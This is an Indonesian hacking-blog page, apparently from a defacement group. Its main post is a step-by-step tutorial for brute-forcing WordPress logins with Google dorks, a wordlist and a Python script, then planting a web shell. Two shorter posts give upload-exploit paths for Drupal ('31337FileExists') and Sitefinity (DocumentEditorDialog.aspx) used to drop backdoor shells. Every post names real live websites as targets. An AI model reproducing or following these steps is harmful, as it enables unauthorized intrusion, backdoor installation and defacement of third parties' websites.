Cara WP BruteForce Online dan Menggunakan Python Wordpress BruteForce

Oleh
Cara WP BruteForce Online dan Menggunakan Python Wordpress BruteForce


Sesuai dengan judulnya, disini saya akan memberikan tutorial Deface WordPress Dengan Tool BruteForce Online dan dengan Menggunakan Python WordPress BruteForce. Yah.. Dua cara satu postingan ^_^


Pertama
Tutorial WP BruteForce Menggunakan Python WordPress BruteForce

Bahan :

Python
       

Script Python
          NB : Setelah Python Terinstal, copy script python lalu save dengan format .py

Wordlist

Dork : - inurl:wp-login.php
           - Author/admin "text"

Step By Step :

1. Cari dulu site WP yang akan di WP BruteForce menggunakan dork diatas

2. Cari username WP-nya dengan menggunakan tools ada searching google :v Use Your Brain :'v
    cara mudahnya dengan memasukkan username "admin" lalu memasukkan password asal dulu

Jika muncul Notif seperti dibawah ini berarti usernamenya admin
3. Tinggal kita BruteForce Passwordnya

4. Instal Dahulu Python-nya

5. Setelah selesai terinstal, copy script python lalu save dengan format .py

6. Setelah itu download Wordlistnya

7. Semuanya Gabungkan dalam satu folder
8. Buka CMD lalu masuk ke folder dimana kalian menyimpan file python tadi ( cd/folder ) jika suda masuk  ketikan :

    [namafile].py -h http://[situstarget]/wp-login.php -u [username] -P [wordlist].txt
   contoh : python.py -h http://equilibriobrasilia.eco.br/wp-login.php -u equilibriobrasilia -P wordlist.txt
9. Lalu Tekan Enter dan tunggu proses berjalan..
10. Jika Tampilan Seperti ini, berarti kita telah berhasil mendapatkan password wordpress-nya
11. Lalu pergi ke WP Login dan Masukkan Username dan Password yang telah di BruteForce tadi
12. Login Berhasil :'v
      Setelah itu Apa?! Yahh.. Tanam Shell lah cuk :3
Caranya?! contact aja -_- 10 orang bertanya nanti ane buat post :'v 

Oke sekian tutorial ini...
Lanjut Yang Online :'v 
Hy I'm From Hallucination Cyber

Komentar

Posting Komentar

Oce :*

./AnChan

31337FileExists Exploit and Upload Shell

Oleh
Gambar
31337FileExists Exploit and Upload Shell Bahan Bahan : 1. Dork : - "31337FileExists"                 -  "31337FileExists" inurl:"node" 2. Exploit : /sites/default/files/up.php 3. Shell Backdoor :      Shell mini ( Jika Shell biasa tidak support ) :  Download 4. Script Deface :  Download Step By Step : 1. Dorking dulu di Google  "31337FileExists" 2. Pilih Salah Satu Web     Live Target :  http://roundhousearchitecture.com/ 3. Masukkan Exploit :  sites/default/files/up.php     contoh :  http://roundhousearchitecture.com/ sites/default/files/up.php     Jika Vuln akan ada Tempat Upload seperti ini 4. Tinggal Upload deh shell backdoor kalian  Jika sukses akan seperti ini 5. Tinggal masuk deh ke akses shell yang udah di Upload      Akses shell : / sites/default/files/[nama_shell].php     contoh :  http://roundhousearchitecture.com/ sites/default/files/guel.php Dan BeginiLah Hasilnya Terserah Kalian
Baca Disini Bangsat
Oleh
Gambar
Exploit CMS Sitefinity Editor Dialogs [ Upload Shell ] Sudah Lama Ga ada Postingan nih Blog :'v Cuma mau share Exploit lama yang masih Banyak Targetnya :'v Yaitu "Exploit CMS Sitefinity Editor Dialogs" Mungkin dah ada Yang pernah makenya :'v Langsung Saja... Bahan : 1. shell aspx => Yang belom punya download disini    passwordnya : admin 2. Dork : - inurl:"/Sitefinity/login.aspx"                 - "UserControls/Dialogs"                 - "Sitefinity: Login" 3.  Exploit : /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx 4. Dan yang paling Penting => "KESABARAN" :'v Step By Step : 1. Dorking dulu ke Google inurl:"/Sitefinity/login.aspx" 2. Pilih Salah Satu Web Target     Live Target : http://www.calstart.org/ 3. Masukkan Exploitnya Site.target/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx     Contoh : http://www.calstart.org/sitefinity/UserControls/Dial
Baca Disini Bangsat